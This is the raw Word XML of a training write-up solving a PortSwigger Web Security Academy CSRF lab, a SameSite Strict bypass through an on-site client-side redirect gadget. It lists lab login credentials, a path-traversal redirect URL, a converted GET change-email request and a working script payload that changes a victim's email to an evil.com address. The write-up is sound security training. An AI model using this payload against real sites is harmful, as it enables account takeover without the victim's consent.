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0ABC7" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C0392B"/>
        <w:ind w:left="-1440" w:right="-1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Security Academy — Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697ACAFB" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00775E4D">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C9E949" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="566573"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lab 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0750CA" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="200"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Strict bypass via on-site gadget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775E4D" w14:paraId="538675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322DC" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Category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D24B8" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00775E4D" w14:paraId="6BC169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CFE41" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lab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2FB59" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lab 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00775E4D" w14:paraId="3E8472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E1B53" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Completed By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B2FC5" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Security Researcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00775E4D" w14:paraId="410DF8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150EF" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Platform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AD018" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PortSwigger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Security Academy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5003CAF3" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00775E4D">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8DB4CE" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Lab Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E0539" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="F39C12"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF9E7"/>
        <w:spacing w:after="200"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Strict bypass using an on-site gadget to change the victim's email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB32FF" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Step-by-Step Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E051EF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t>Log in to the lab using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B3E383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t>Username: wiener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672C0070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t>Password: peter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E19BF74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t>Open any blog post.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD274CB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t>Submit a random comment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D77DAB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t>After submitting the comment, observe the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FCCE81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t>/post/comment/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>confirmation?postId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8B0C58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t>In Burp Suite, go to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776571DE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t>Proxy → HTTP history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CE530E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t>Find the request for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54E7DF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t>/resources/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/commentConfirmationRedirect.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1350412A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Observe that the JavaScript uses the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> parameter to create a client-side redirect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E091FF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t>Test path traversal in browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4D9DC8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t>https://0abc006c042a9dc680911227005c0006.web-security-academy.net/post/comment/confirmation?postId=1/../../my-account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAAD9B2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t>Confirm that the browser redirects to /my-account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6E6BE9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t>Change your email once and intercept the request in Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562EB95D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t>Observe the request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5989F807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t>POST /my-account/change-email HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFD1D2E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t>Host: 0abc006c042a9dc680911227005c0006.web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3555321F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t>email=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test@test.com&amp;submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2070A2E2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t>Send the request to Burp Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2586DB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t>Right-click the request and select:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B32F5C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t>Change request method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032CD848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t>Burp converts it into:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A71FF4C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t>GET /my-account/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>change-email?email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test@test.com&amp;submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1 HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325BE8D8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t>Host: 0abc006c042a9dc680911227005c0006.web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0075F9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t>Send the request and confirm the email changes successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBA7A38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t>Open the Exploit Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEF88FE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Paste the following payload into the Body section:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67392A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t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5608BF46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t>document.location="https://0abc006c042a9dc680911227005c0006.web-security-academy.net/post/comment/confirmation?postId=1/../../my-account/change-email?email=finalvictim2026@evil.com%26submit=1";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289EB10E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t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFB2AA5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t>Click Store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409FDD80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t>Click View exploit and confirm your email changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50013E28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t>Change the email address to a fresh unused email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABA6962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t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C69C12C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t>solve9981@evil.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40249664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t>Click Store again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AA5943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t>Click Deliver to victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602F3E7F" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>After a few seconds, the lab will be solved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7D8234" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00775E4D">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF8C63A" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshots &amp; Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED987E5" w14:textId="77777777" w:rsidR="00775E4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DE231D2" wp14:editId="299E10F8">
            <wp:extent cx="533400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3A74" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 1: Comment On Any Post Blog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B23AF3" w14:textId="77777777" w:rsidR="00775E4D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FFDBF1B" wp14:editId="34992D73">
            <wp:extent cx="5334000" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1257977958" name="Picture 1257977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C48B4" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2: Find 2 Request </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MailChange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> And Post Comment Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6177AF8E" w14:textId="07BAC279" w:rsidR="007505BA" w:rsidRDefault="007505BA">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22C33E20" wp14:editId="7D6CE30E">
            <wp:extent cx="6400800" cy="2296886"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="34555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53097" name="Picture 3455530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6655" cy="229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F34B" w14:textId="77777777" w:rsidR="007505BA" w:rsidRDefault="007505BA" w:rsidP="007505BA">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="27AE60"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAFAF1"/>
        <w:spacing w:before="200" w:after="80"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
        </w:rPr>
        <w:t>Lab Solved — Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EFAD96" w14:textId="77777777" w:rsidR="007505BA" w:rsidRDefault="007505BA">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701C5A72" w14:textId="77777777" w:rsidR="007505BA" w:rsidRDefault="007505BA">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BE4612" w14:textId="05E2FD4E" w:rsidR="00775E4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37168EB" wp14:editId="2CACE4F8">
            <wp:extent cx="5333342" cy="2378529"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
            <wp:docPr id="986730859" name="Picture 986730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296" cy="238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25C3" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 3: Lab Solved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461C822E" w14:textId="77777777" w:rsidR="00775E4D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9899D64" wp14:editId="4F67C504">
            <wp:extent cx="5334000" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1201194798" name="Picture 1201194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FE78" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4: Login The Account With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Creditional</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76C120AD" w14:textId="77777777" w:rsidR="00775E4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AFE136D" wp14:editId="603C28CB">
            <wp:extent cx="5334000" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1062386210" name="Picture 1062386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79F1" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5: Modify The Header Request For Checking The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Chenginf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mail Perform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC5FE5F" w14:textId="77777777" w:rsidR="00775E4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EF5D8AC" wp14:editId="38863206">
            <wp:extent cx="5334000" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="542428242" name="Picture 542428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6AF6" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 6: Modify The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Hreader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Request Post Comment On Product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2360414D" w14:textId="77777777" w:rsidR="00775E4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F39ED9E" wp14:editId="3C5D8D48">
            <wp:extent cx="5334000" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1538374564" name="Picture 1538374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E9F5" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uplaod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Paylaod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Body Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD44AD" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00775E4D">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA09789" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="27AE60"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="27AE60"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAFAF1"/>
        <w:spacing w:before="160" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab Status: SOLVED</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00775E4D">
      <w:headerReference w:type="default" r:id="rId14"/>
      <w:footerReference w:type="default" r:id="rId1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32BC0" w14:textId="77777777" w:rsidR="000311D5" w:rsidRDefault="000311D5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="11E5590D" w14:textId="77777777" w:rsidR="000311D5" w:rsidRDefault="000311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5EFFF" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="922B21"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>SameSite</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> Strict bypass via on-site gadget  |  Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="007505BA">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5665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6268E" w14:textId="77777777" w:rsidR="000311D5" w:rsidRDefault="000311D5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1D791329" w14:textId="77777777" w:rsidR="000311D5" w:rsidRDefault="000311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CF44C" w14:textId="77777777" w:rsidR="00775E4D" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0392B"/>
      </w:pBdr>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>PortSwigger</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> Academy PoC  |  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="C0392B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>CSRF — Lab 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254A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EBA60244"/>
    <w:lvl w:ilvl="0" w:tplc="33CEE7E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AE66FD5A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="170EDD60">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6CB0338E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2AE299B6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="771A8FBA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="552022A6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A6D8590E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F79481FA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3D0658BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="038C4CCC"/>
    <w:lvl w:ilvl="0" w:tplc="C1DE13A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A204F508">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E55EF9AE">
      <w:start w:val="1"/>
